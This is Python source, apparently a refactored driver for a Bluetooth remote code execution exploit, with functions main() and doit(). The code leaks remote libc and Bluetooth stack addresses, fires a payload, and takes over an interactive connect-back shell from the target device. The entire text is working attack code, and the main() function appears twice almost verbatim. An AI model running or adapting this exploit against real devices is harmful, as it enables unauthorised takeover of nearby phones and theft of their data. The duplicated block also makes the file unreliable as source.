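def main(src_hci, dst, my_ip):
    """Run the exploit end to end against ``dst`` and hand over a shell.

    Flow: reset the local adapter (``sspmode 0``, drop any link to the target),
    open the connect-back listeners, then for up to PWN_ATTEMPTS rounds pick a
    fresh random local BDADDR, leak the remote libc ``.text`` and
    bluetooth.default ``.bss`` bases, derive the ``system`` and ACL remote-name
    addresses and call ``pwn``; the first round in which ``sh_s`` becomes
    readable wins and ``connectback.interactive_shell`` takes over.

    Args:
        src_hci: local HCI interface name; its BDADDR is re-randomised every
            round via ``set_rand_bdaddr``.
        dst: target BDADDR.
        my_ip: address the payload connects back to; passed through to ``pwn``
            and ``connectback.interactive_shell``.

    Raises:
        RuntimeError: no page-aligned base pair was leaked within LEAK_ATTEMPTS,
            the derived ACL name address is not 4-byte aligned, or no
            connect-back arrived in any of the PWN_ATTEMPTS rounds. The
            original signalled all three with ``assert``, which ``python -O``
            strips -- the exploit would then fire with garbage addresses and
            finally drop into ``interactive_shell`` with nothing connected.
    """
    import subprocess

    # Argument-list form: neither the interface name nor the target BDADDR is
    # interpolated into a shell command line (the original used os.system with
    # '%s'). Exit codes are not checked, as before; ``hcitool dc`` presumably
    # fails when there is no existing link to drop -- confirm before making
    # either call fatal.
    subprocess.call(['hciconfig', src_hci, 'sspmode', '0'])
    subprocess.call(['hcitool', 'dc', dst])

    sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT)

    for attempt in range(PWN_ATTEMPTS):
        log.info('Pwn attempt %d:' % (attempt,))

        # Fresh source BDADDR for every round.
        src = set_rand_bdaddr(src_hci)
        # Left disabled in the original; kept for reference:
        # set_bt_name("TESTTESTTESTTEST", src_hci, src, dst)  # Set Name, REMOTE_NAME address search

        # Leak the section bases. A real base is page aligned, so non-zero low
        # 12 bits mean the leak returned junk and we retry. (Python's ``&``
        # binds tighter than ``==``, unlike C; the parentheses only restate what
        # the original expression already meant.)
        for _ in range(LEAK_ATTEMPTS):
            libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(src, src_hci, dst)
            if (libc_text_base & 0xfff) == 0 and (bluetooth_default_bss_base & 0xfff) == 0:
                break
        else:
            raise RuntimeError("Memory doesn't seem to have leaked as expected. Wrong .so versions?")

        system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base
        acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base
        if acl_name_addr % 4 != 0:
            raise RuntimeError('acl_name address 0x%08x is not 4-byte aligned' % (acl_name_addr,))
        log.info('system: 0x%08x, acl_name: 0x%08x' % (system_addr, acl_name_addr))

        pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)

        # Wait up to PWNING_TIMEOUT for the listener to become readable, which
        # presumably means the payload connected back.
        readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
        if readable:
            log.info('Done')
            break
    else:
        raise RuntimeError("Pwning failed all attempts")

    connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT)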
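def doit(dst, my_ip):
    """Single-shot variant of the exploit using hard-coded section bases.

    Unlike ``main`` there is no leak phase and no retry loop: the ``system``
    and ACL remote-name addresses are computed from the module-level
    LIBC_BASE / BLUETOOTH_BSS_BASE constants, so this only works against a
    target whose layout matches them. The local adapter is HCI_DEV and its
    BDADDR is not randomised.

    Args:
        dst: target BDADDR.
        my_ip: address the payload connects back to; passed through to ``pwn``
            and ``connectback.interactive_shell``.

    Raises:
        RuntimeError: no connect-back arrived within PWNING_TIMEOUT. The
            original only printed on success and then called
            ``interactive_shell`` regardless of the ``select`` result, i.e. it
            would try to drive a shell that never connected; ``main`` treats
            the same condition as failure, and this now matches it.
    """
    import subprocess

    # Argument-list form: HCI_DEV and the target BDADDR are not interpolated
    # into a shell command line (the original used os.system with '%s'). Exit
    # codes are not checked, as before; ``hcitool dc`` presumably fails when
    # there is no existing link to drop -- confirm before making it fatal.
    subprocess.call(['hciconfig', HCI_DEV, 'sspmode', '0'])
    subprocess.call(['hcitool', 'dc', dst])

    sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT)

    # Fixed layout: no ASLR leak, just base + offset from module constants.
    system_addr = LIBC_BASE + SYSTEM_OFFSET
    acl_name_addr = BLUETOOTH_BSS_BASE + ACL_NAME_OFFSET
    print("[*] SYSTEM_ADDR: 0x%x" % system_addr)
    print("[*] PAYLOAD_ADDR: 0x%x" % acl_name_addr)

    pwn(dst, system_addr, acl_name_addr, my_ip)

    # Wait up to PWNING_TIMEOUT for the listener to become readable, which
    # presumably means the payload connected back.
    readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
    if not readable:
        raise RuntimeError("No connect-back within %s seconds; pwn failed" % (PWNING_TIMEOUT,))
    print('[*] Done')
    connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT)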
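def main(src_hci, dst, my_ip):
    """Run the exploit end to end against ``dst`` and hand over a shell.

    Flow: reset the local adapter (``sspmode 0``, drop any link to the target),
    open the connect-back listeners, then for up to PWN_ATTEMPTS rounds pick a
    fresh random local BDADDR, leak the remote libc ``.text`` and
    bluetooth.default ``.bss`` bases, derive the ``system`` and ACL remote-name
    addresses and call ``pwn``; the first round in which ``sh_s`` becomes
    readable wins and ``connectback.interactive_shell`` takes over.

    Args:
        src_hci: local HCI interface name; its BDADDR is re-randomised every
            round via ``set_rand_bdaddr``.
        dst: target BDADDR.
        my_ip: address the payload connects back to; passed through to ``pwn``
            and ``connectback.interactive_shell``.

    Raises:
        RuntimeError: no page-aligned base pair was leaked within LEAK_ATTEMPTS,
            the derived ACL name address is not 4-byte aligned, or no
            connect-back arrived in any of the PWN_ATTEMPTS rounds. The
            original signalled all three with ``assert``, which ``python -O``
            strips -- the exploit would then fire with garbage addresses and
            finally drop into ``interactive_shell`` with nothing connected.
    """
    import subprocess

    # Argument-list form: neither the interface name nor the target BDADDR is
    # interpolated into a shell command line (the original used os.system with
    # '%s'). Exit codes are not checked, as before; ``hcitool dc`` presumably
    # fails when there is no existing link to drop -- confirm before making
    # either call fatal.
    subprocess.call(['hciconfig', src_hci, 'sspmode', '0'])
    subprocess.call(['hcitool', 'dc', dst])

    sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT)

    for attempt in range(PWN_ATTEMPTS):
        log.info('Pwn attempt %d:' % (attempt,))

        # Fresh source BDADDR for every round.
        src = set_rand_bdaddr(src_hci)

        # Leak the section bases. A real base is page aligned, so non-zero low
        # 12 bits mean the leak returned junk and we retry. (Python's ``&``
        # binds tighter than ``==``, unlike C; the parentheses only restate what
        # the original expression already meant.)
        for _ in range(LEAK_ATTEMPTS):
            libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(src, src_hci, dst)
            if (libc_text_base & 0xfff) == 0 and (bluetooth_default_bss_base & 0xfff) == 0:
                break
        else:
            raise RuntimeError("Memory doesn't seem to have leaked as expected. Wrong .so versions?")

        system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base
        acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base
        if acl_name_addr % 4 != 0:
            raise RuntimeError('acl_name address 0x%08x is not 4-byte aligned' % (acl_name_addr,))
        log.info('system: 0x%08x, acl_name: 0x%08x' % (system_addr, acl_name_addr))

        pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)

        # Wait up to PWNING_TIMEOUT for the listener to become readable, which
        # presumably means the payload connected back.
        readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
        if readable:
            log.info('Done')
            break
    else:
        raise RuntimeError("Pwning failed all attempts")

    connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT)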